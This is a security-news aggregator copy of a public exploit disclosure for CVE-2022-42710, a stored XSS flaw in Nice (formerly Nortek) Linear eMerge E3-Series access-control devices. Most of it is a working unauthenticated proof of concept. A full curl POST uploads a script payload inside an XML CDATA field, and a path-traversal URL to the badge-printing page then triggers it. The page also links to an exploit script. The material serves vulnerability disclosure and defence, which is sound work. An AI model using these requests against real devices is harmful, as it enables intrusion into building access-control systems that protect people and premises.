Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-42710: Security-Research/CVE-2022-42710.txt at main · omarhashem123/Security-Research

Nice (formerly Nortek) Linear eMerge E3-Series 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e devices are vulnerable to Stored Cross-Site Scripting (XSS).

CVE
Open in Source
#xss#web#git#php#auth

Permalink

Cannot retrieve contributors at this time

# Exploit Title: Nortek Linear eMerge E3-Series - Stored XSS

# Exploit Author: Omar Hashim

# Versions: 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, 0.32-08e

# Vendor home page: https://na.niceforyou.com/brands/linear/

# Vendor home page: https://www.nortekcontrol.com/access-control/

# Vendor home page: https://linear-solutions.com/

# Authentication Required: No

# CVE : CVE-2022-42710

# Description

====================

Nice (formerly Nortek) Linear eMerge E3-Series 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e devices are vulnerable to Stored Cross-Site Scripting (XSS).

#Proof Of Concept:

====================

You can find the research here

Research: https://omar0x01.medium.com/cve-2022-42710-a-journey-through-xxe-to-stored-xss-851d74dfe917

Steps with curl:

1- Upload the XSS Payload

curl -i -s -k -X $’POST’ \

-H $’Host: <HOST:PORT>’ -H $’Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8’ -H $’Accept-Language: en-US,en;q=0.5’ -H $’Accept-Encoding: gzip, deflate’ -H $’Connection: close’ -H $’Upgrade-Insecure-Requests: 1’ -H $’Cache-Control: max-age=0’ -H $’Content-Length: 203’ -H $’Content-Type: application/x-www-form-urlencoded’ \

–data-binary $’<?xml version=\"1.0\"?>\x0d\x0a<xml><orientations><orientation>L</orientation><background><![CDATA[\’><script>alert(document.domain);</script><img alt=\"Image not exist\" src=\’x]]></background></orientations></xml>’ \

$’http://<HOST:PORT>/badging/person_funct.php’

2- In the response you will find http://127.0.0.1/badging/…/user_img/<TimeStamp-will-be-printed-here>.jpg (e.g. http://127.0.0.1/…/user_img/20221001190845.jpg)

3- Copy the TimeStamp

4- http://<HOST:PORT>/badging/badge_template_print.php?idt=1&tpl=…/…/user_img/<Paste-timestamp-here>.jpg (e.g. http://<HOST:PORT>/badging/badge_template_print.php?idt=1&tpl=…/…/user_img/20221001190845.jpg

5- You will find the POP UP alert

Exploit script:

https://github.com/omarhashem123/Security-Research/tree/main/CVE-2022-42710

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE